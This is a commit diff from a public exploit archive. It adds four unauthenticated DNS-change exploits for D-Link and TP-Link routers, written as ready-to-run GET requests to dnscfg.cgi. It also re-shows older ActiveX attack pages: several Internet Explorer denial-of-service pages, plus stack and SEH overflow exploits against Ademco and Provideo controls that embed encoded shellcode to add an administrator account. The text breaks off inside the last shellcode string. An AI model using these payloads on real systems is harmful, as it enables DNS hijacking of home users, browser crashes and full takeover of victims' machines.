DB: 2015-06-09
4 new exploits
This commit is contained in:
parent
6a755b7b3d
commit
82307c8cbc
14 changed files with 1158 additions and 1022 deletions
31
platforms/hardware/webapps/37237.txt
Executable file
31
platforms/hardware/webapps/37237.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
D-Link DSL-2780B DLink_1.01.14
|
||||
Unauthenticated Remote DNS Change
|
||||
|
||||
Copyright 2015 (c) Todor Donev
|
||||
<todor.donev at gmail.com>
|
||||
http://www.ethical-hacker.org/
|
||||
https://www.facebook.com/ethicalhackerorg
|
||||
|
||||
No description for morons,
|
||||
script kiddies & noobs !!
|
||||
|
||||
Disclaimer:
|
||||
This or previous programs is for Educational
|
||||
purpose ONLY. Do not use it without permission.
|
||||
The usual disclaimer applies, especially the
|
||||
fact that Todor Donev is not liable for any
|
||||
damages caused by direct or indirect use of the
|
||||
information or functionality provided by these
|
||||
programs. The author or any Internet provider
|
||||
bears NO responsibility for content or misuse
|
||||
of these programs or any derivatives thereof.
|
||||
By using these programs you accept the fact
|
||||
that any damage (dataloss, system crash,
|
||||
system compromise, etc.) caused by the use
|
||||
of these programs is not Todor Donev's
|
||||
responsibility.
|
||||
|
||||
Use them at your own risk!
|
||||
|
||||
|
||||
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1
|
31
platforms/hardware/webapps/37238.txt
Executable file
31
platforms/hardware/webapps/37238.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
TP-Link ADSL2+ TD-W8950ND
|
||||
Unauthenticated Remote DNS Change
|
||||
|
||||
Copyright 2015 (c) Todor Donev
|
||||
<todor.donev at gmail.com>
|
||||
http://www.ethical-hacker.org/
|
||||
https://www.facebook.com/ethicalhackerorg
|
||||
|
||||
No description for morons,
|
||||
script kiddies & noobs !!
|
||||
|
||||
Disclaimer:
|
||||
This or previous programs is for Educational
|
||||
purpose ONLY. Do not use it without permission.
|
||||
The usual disclaimer applies, especially the
|
||||
fact that Todor Donev is not liable for any
|
||||
damages caused by direct or indirect use of the
|
||||
information or functionality provided by these
|
||||
programs. The author or any Internet provider
|
||||
bears NO responsibility for content or misuse
|
||||
of these programs or any derivatives thereof.
|
||||
By using these programs you accept the fact
|
||||
that any damage (dataloss, system crash,
|
||||
system compromise, etc.) caused by the use
|
||||
of these programs is not Todor Donev's
|
||||
responsibility.
|
||||
|
||||
Use them at your own risk!
|
||||
|
||||
|
||||
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
39
platforms/hardware/webapps/37240.txt
Executable file
39
platforms/hardware/webapps/37240.txt
Executable file
|
@ -0,0 +1,39 @@
|
|||
D-Link DSL-2730B AU_2.01
|
||||
Authentication Bypass DNS Change
|
||||
|
||||
Copyright 2015 (c) Todor Donev
|
||||
<todor.donev at gmail.com>
|
||||
http://www.ethical-hacker.org/
|
||||
https://www.facebook.com/ethicalhackerorg
|
||||
|
||||
Disclaimer:
|
||||
This or previous programs is for Educational
|
||||
purpose ONLY. Do not use it without permission.
|
||||
The usual disclaimer applies, especially the
|
||||
fact that Todor Donev is not liable for any
|
||||
damages caused by direct or indirect use of the
|
||||
information or functionality provided by these
|
||||
programs. The author or any Internet provider
|
||||
bears NO responsibility for content or misuse
|
||||
of these programs or any derivatives thereof.
|
||||
By using these programs you accept the fact
|
||||
that any damage (dataloss, system crash,
|
||||
system compromise, etc.) caused by the use
|
||||
of these programs is not Todor Donev's
|
||||
responsibility.
|
||||
|
||||
Use them at your own risk!
|
||||
|
||||
This security hole allows an attacker to bypass
|
||||
authentication and change the DNS. When the
|
||||
administrator is logged in the web management
|
||||
interface, an attacker may be able to completely
|
||||
bypass authentication phase and connect to the
|
||||
web management interface with administrator's
|
||||
credentials. This attack can also be performed
|
||||
by an external attacker who connects to the
|
||||
router's public IP address, if remote management
|
||||
is enabled. To change the DNS without logging
|
||||
into web management interface use the following URL:
|
||||
|
||||
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
|
31
platforms/hardware/webapps/37241.txt
Executable file
31
platforms/hardware/webapps/37241.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
D-Link DSL-526B ADSL2+ AU_2.01
|
||||
Unauthenticated Remote DNS Change
|
||||
|
||||
Copyright 2015 (c) Todor Donev
|
||||
<todor.donev at gmail.com>
|
||||
http://www.ethical-hacker.org/
|
||||
https://www.facebook.com/ethicalhackerorg
|
||||
|
||||
No description for morons,
|
||||
script kiddies & noobs !!
|
||||
|
||||
Disclaimer:
|
||||
This or previous programs is for Educational
|
||||
purpose ONLY. Do not use it without permission.
|
||||
The usual disclaimer applies, especially the
|
||||
fact that Todor Donev is not liable for any
|
||||
damages caused by direct or indirect use of the
|
||||
information or functionality provided by these
|
||||
programs. The author or any Internet provider
|
||||
bears NO responsibility for content or misuse
|
||||
of these programs or any derivatives thereof.
|
||||
By using these programs you accept the fact
|
||||
that any damage (dataloss, system crash,
|
||||
system compromise, etc.) caused by the use
|
||||
of these programs is not Todor Donev's
|
||||
responsibility.
|
||||
|
||||
Use them at your own risk!
|
||||
|
||||
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"
|
||||
var dns2 = '8.8.8.8';
|
|
@ -42,6 +42,6 @@ $buffer2 .= $newret;
|
|||
exec("mail -s wow -c $buffer2 root@localhost");
|
||||
|
||||
#EOF
|
||||
|
||||
|
||||
# milw0rm.com [2003-06-10]
|
||||
|
||||
|
||||
# milw0rm.com [2003-06-10]
|
||||
|
|
|
@ -212,6 +212,6 @@ sub mychomp {
|
|||
$data = substr($arg, 0, length($arg) - $CRLF);
|
||||
return $data;
|
||||
}
|
||||
|
||||
|
||||
# milw0rm.com [2003-06-08]
|
||||
|
||||
|
||||
# milw0rm.com [2003-06-08]
|
||||
|
|
|
@ -1,50 +1,50 @@
|
|||
<pre>
|
||||
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
|
||||
RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
|
||||
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
|
||||
<select style="width: 404px" name="Pucca">
|
||||
<option value = "GetComponentVersion">GetComponentVersion</option>
|
||||
<option value = "HandleAction">HandleAction</option>
|
||||
<option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
|
||||
<option value = "Quoting">Quoting...</option>
|
||||
</select>
|
||||
|
||||
|
||||
|
||||
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
||||
|
||||
<script language='vbscript'>
|
||||
Sub tryMe
|
||||
on error resume next
|
||||
if Pucca.value="GetComponentVersion" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
RealPlayer.GetComponentVersion arg1
|
||||
elseif Pucca.value="HandleAction" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
RealPlayer.HandleAction arg1
|
||||
elseif Pucca.value = "DoAutoUpdateRequest" then
|
||||
argCount = 3
|
||||
arg1=1
|
||||
arg2=String(1000000, "A")
|
||||
arg3=1
|
||||
RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
|
||||
else
|
||||
MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
|
||||
"The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
|
||||
"Their tags shall blink until the end of days."
|
||||
end if
|
||||
End Sub
|
||||
</script>
|
||||
</span></span>
|
||||
</code></pre>
|
||||
|
||||
# milw0rm.com [2006-12-28]
|
||||
<pre>
|
||||
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
|
||||
RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
|
||||
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
|
||||
<select style="width: 404px" name="Pucca">
|
||||
<option value = "GetComponentVersion">GetComponentVersion</option>
|
||||
<option value = "HandleAction">HandleAction</option>
|
||||
<option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
|
||||
<option value = "Quoting">Quoting...</option>
|
||||
</select>
|
||||
|
||||
|
||||
|
||||
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
||||
|
||||
<script language='vbscript'>
|
||||
Sub tryMe
|
||||
on error resume next
|
||||
if Pucca.value="GetComponentVersion" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
RealPlayer.GetComponentVersion arg1
|
||||
elseif Pucca.value="HandleAction" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
RealPlayer.HandleAction arg1
|
||||
elseif Pucca.value = "DoAutoUpdateRequest" then
|
||||
argCount = 3
|
||||
arg1=1
|
||||
arg2=String(1000000, "A")
|
||||
arg3=1
|
||||
RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
|
||||
else
|
||||
MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
|
||||
"The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
|
||||
"Their tags shall blink until the end of days."
|
||||
end if
|
||||
End Sub
|
||||
</script>
|
||||
</span></span>
|
||||
</code></pre>
|
||||
|
||||
# milw0rm.com [2006-12-28]
|
||||
|
|
|
@ -1,23 +1,23 @@
|
|||
<!--
|
||||
--------------------------------------------------------------------------
|
||||
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
---------------------------------------------------------------------------
|
||||
-->
|
||||
|
||||
<html>
|
||||
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
argCount = 1
|
||||
|
||||
arg1=String(1000000, "A")
|
||||
|
||||
Flash8b.AllowScriptAccess=arg1
|
||||
|
||||
</script>
|
||||
|
||||
# milw0rm.com [2006-12-29]
|
||||
<!--
|
||||
--------------------------------------------------------------------------
|
||||
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
---------------------------------------------------------------------------
|
||||
-->
|
||||
|
||||
<html>
|
||||
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
argCount = 1
|
||||
|
||||
arg1=String(1000000, "A")
|
||||
|
||||
Flash8b.AllowScriptAccess=arg1
|
||||
|
||||
</script>
|
||||
|
||||
# milw0rm.com [2006-12-29]
|
||||
|
|
|
@ -1,23 +1,23 @@
|
|||
<!--
|
||||
---------------------------------------------------------------------------
|
||||
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
---------------------------------------------------------------------------
|
||||
-->
|
||||
|
||||
<html>
|
||||
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
argCount = 1
|
||||
|
||||
arg1=String(1000000, "A")
|
||||
|
||||
ShockW.swURL = arg1
|
||||
|
||||
</script>
|
||||
|
||||
# milw0rm.com [2006-12-29]
|
||||
<!--
|
||||
---------------------------------------------------------------------------
|
||||
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
---------------------------------------------------------------------------
|
||||
-->
|
||||
|
||||
<html>
|
||||
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
argCount = 1
|
||||
|
||||
arg1=String(1000000, "A")
|
||||
|
||||
ShockW.swURL = arg1
|
||||
|
||||
</script>
|
||||
|
||||
# milw0rm.com [2006-12-29]
|
||||
|
|
|
@ -1,25 +1,25 @@
|
|||
<!--
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
-->
|
||||
<html>
|
||||
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
argCount = 1
|
||||
|
||||
arg1=String(2000000, "A")
|
||||
|
||||
CCRP_BDc.SelectedFolder = arg1
|
||||
</script>
|
||||
|
||||
<script language='javascript'>
|
||||
document.location.reload()
|
||||
</script>
|
||||
|
||||
# milw0rm.com [2007-01-18]
|
||||
<!--
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
-----------------------------------------------------------------------------------------------------------
|
||||
-->
|
||||
<html>
|
||||
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
argCount = 1
|
||||
|
||||
arg1=String(2000000, "A")
|
||||
|
||||
CCRP_BDc.SelectedFolder = arg1
|
||||
</script>
|
||||
|
||||
<script language='javascript'>
|
||||
document.location.reload()
|
||||
</script>
|
||||
|
||||
# milw0rm.com [2007-01-18]
|
||||
|
|
|
@ -1,62 +1,62 @@
|
|||
<pre>
|
||||
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
|
||||
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
|
||||
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
|
||||
<select style="width: 404px" name="Pucca">
|
||||
<option value = "BGCOLOR">BGCOLOR</option>
|
||||
<option value = "SRC">SRC</option>
|
||||
<option value = "AutoStart">AutoStart</option>
|
||||
<option value = "Sound">Sound</option>
|
||||
<option value = "DrawLogo">DrawLogo</option>
|
||||
<option value = "DrawProgress">DrawProgress</option>
|
||||
<option value = "Quoting">Quoting...</option>
|
||||
</select>
|
||||
|
||||
|
||||
|
||||
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
||||
|
||||
<script language='vbscript'>
|
||||
Sub tryMe
|
||||
on error resume next
|
||||
if Pucca.value="BGCOLOR" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.BGCOLOR = arg1
|
||||
elseif Pucca.value="SRC" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.SRC = arg1
|
||||
elseif Pucca.value = "AutoStart" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.AutoStart = arg1
|
||||
elseif Pucca.value = "Sound" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.Sound = arg1
|
||||
elseif Pucca.value = "DrawLogo" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.DrawLogo = arg1
|
||||
elseif Pucca.value = "DrawProgress" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.DrawProgress = arg1
|
||||
else
|
||||
MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
|
||||
"supreme excellence consists in breaking the enemy's resistance without fighting."
|
||||
end if
|
||||
End Sub
|
||||
</script>
|
||||
</span></span>
|
||||
</code></pre>
|
||||
|
||||
# milw0rm.com [2007-03-07]
|
||||
<pre>
|
||||
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
|
||||
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
|
||||
author: shinnai
|
||||
mail: shinnai[at]autistici[dot]org
|
||||
site: http://shinnai.altervista.org
|
||||
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
|
||||
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
|
||||
<select style="width: 404px" name="Pucca">
|
||||
<option value = "BGCOLOR">BGCOLOR</option>
|
||||
<option value = "SRC">SRC</option>
|
||||
<option value = "AutoStart">AutoStart</option>
|
||||
<option value = "Sound">Sound</option>
|
||||
<option value = "DrawLogo">DrawLogo</option>
|
||||
<option value = "DrawProgress">DrawProgress</option>
|
||||
<option value = "Quoting">Quoting...</option>
|
||||
</select>
|
||||
|
||||
|
||||
|
||||
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
|
||||
|
||||
<script language='vbscript'>
|
||||
Sub tryMe
|
||||
on error resume next
|
||||
if Pucca.value="BGCOLOR" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.BGCOLOR = arg1
|
||||
elseif Pucca.value="SRC" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.SRC = arg1
|
||||
elseif Pucca.value = "AutoStart" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.AutoStart = arg1
|
||||
elseif Pucca.value = "Sound" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.Sound = arg1
|
||||
elseif Pucca.value = "DrawLogo" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.DrawLogo = arg1
|
||||
elseif Pucca.value = "DrawProgress" then
|
||||
argCount = 1
|
||||
arg1=String(1000000, "A")
|
||||
Shockwave.DrawProgress = arg1
|
||||
else
|
||||
MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
|
||||
"supreme excellence consists in breaking the enemy's resistance without fighting."
|
||||
end if
|
||||
End Sub
|
||||
</script>
|
||||
</span></span>
|
||||
</code></pre>
|
||||
|
||||
# milw0rm.com [2007-03-07]
|
||||
|
|
|
@ -1,51 +1,51 @@
|
|||
<!--
|
||||
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
|
||||
remote buffer overflow exploit / XP SP2 it version
|
||||
by rgod
|
||||
site: retrogod.altervista.org
|
||||
|
||||
this activex is installed browsing some webcam pages
|
||||
try this google dork:
|
||||
|
||||
intitle:"Browser Launch Page"
|
||||
(dork credit: dragg, found in GHDB)
|
||||
|
||||
object safety report:
|
||||
|
||||
RegKey Safe for Script: True
|
||||
RegkeySafe for Init: True
|
||||
KillBitSet: False
|
||||
|
||||
here it is what happen, EIP is overwritten after 272 chars passed to
|
||||
Send485CMD method:
|
||||
|
||||
EAX 00000001
|
||||
ECX 0013EA7C ASCII "AAAA ...
|
||||
EDX 7EFF00E4
|
||||
EBX 10007414
|
||||
ESP 0013EB98 ASCII "AAAA ...
|
||||
EBP 41414141
|
||||
ESI 0018022C
|
||||
EDI 00000000
|
||||
EIP 41414141
|
||||
|
||||
SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
|
||||
to less convenient overflows or seh overwrite
|
||||
-->
|
||||
<HTML>
|
||||
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
|
||||
<script language='vbscript'>
|
||||
|
||||
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
|
||||
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
|
||||
NOP= String(12, unescape("%90"))
|
||||
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll
|
||||
|
||||
SunTzu=String(272, "A") + EIP + NOP + SCODE
|
||||
|
||||
BaseRunner.Send485CMD SunTzu
|
||||
|
||||
</script>
|
||||
</HTML>
|
||||
|
||||
# milw0rm.com [2007-05-26]
|
||||
<!--
|
||||
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
|
||||
remote buffer overflow exploit / XP SP2 it version
|
||||
by rgod
|
||||
site: retrogod.altervista.org
|
||||
|
||||
this activex is installed browsing some webcam pages
|
||||
try this google dork:
|
||||
|
||||
intitle:"Browser Launch Page"
|
||||
(dork credit: dragg, found in GHDB)
|
||||
|
||||
object safety report:
|
||||
|
||||
RegKey Safe for Script: True
|
||||
RegkeySafe for Init: True
|
||||
KillBitSet: False
|
||||
|
||||
here it is what happen, EIP is overwritten after 272 chars passed to
|
||||
Send485CMD method:
|
||||
|
||||
EAX 00000001
|
||||
ECX 0013EA7C ASCII "AAAA ...
|
||||
EDX 7EFF00E4
|
||||
EBX 10007414
|
||||
ESP 0013EB98 ASCII "AAAA ...
|
||||
EBP 41414141
|
||||
ESI 0018022C
|
||||
EDI 00000000
|
||||
EIP 41414141
|
||||
|
||||
SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
|
||||
to less convenient overflows or seh overwrite
|
||||
-->
|
||||
<HTML>
|
||||
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
|
||||
<script language='vbscript'>
|
||||
|
||||
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
|
||||
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
|
||||
NOP= String(12, unescape("%90"))
|
||||
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll
|
||||
|
||||
SunTzu=String(272, "A") + EIP + NOP + SCODE
|
||||
|
||||
BaseRunner.Send485CMD SunTzu
|
||||
|
||||
</script>
|
||||
</HTML>
|
||||
|
||||
# milw0rm.com [2007-05-26]
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
|
||||
remote seh overwrite exploit / win2k sp4
|
||||
|
||||
tried the SD-222VPRO camera series,you can reach an online demo here:
|
||||
http://www.provideo.com.tw/security%20live%20demo.htm
|
||||
|
||||
rgod
|
||||
-->
|
||||
<HTML>
|
||||
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4' id='Camimage' /></object>
|
||||
<script language='vbscript'>
|
||||
|
||||
REM metasploit one, add a user 'su' with pass 'tzu'
|
||||
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%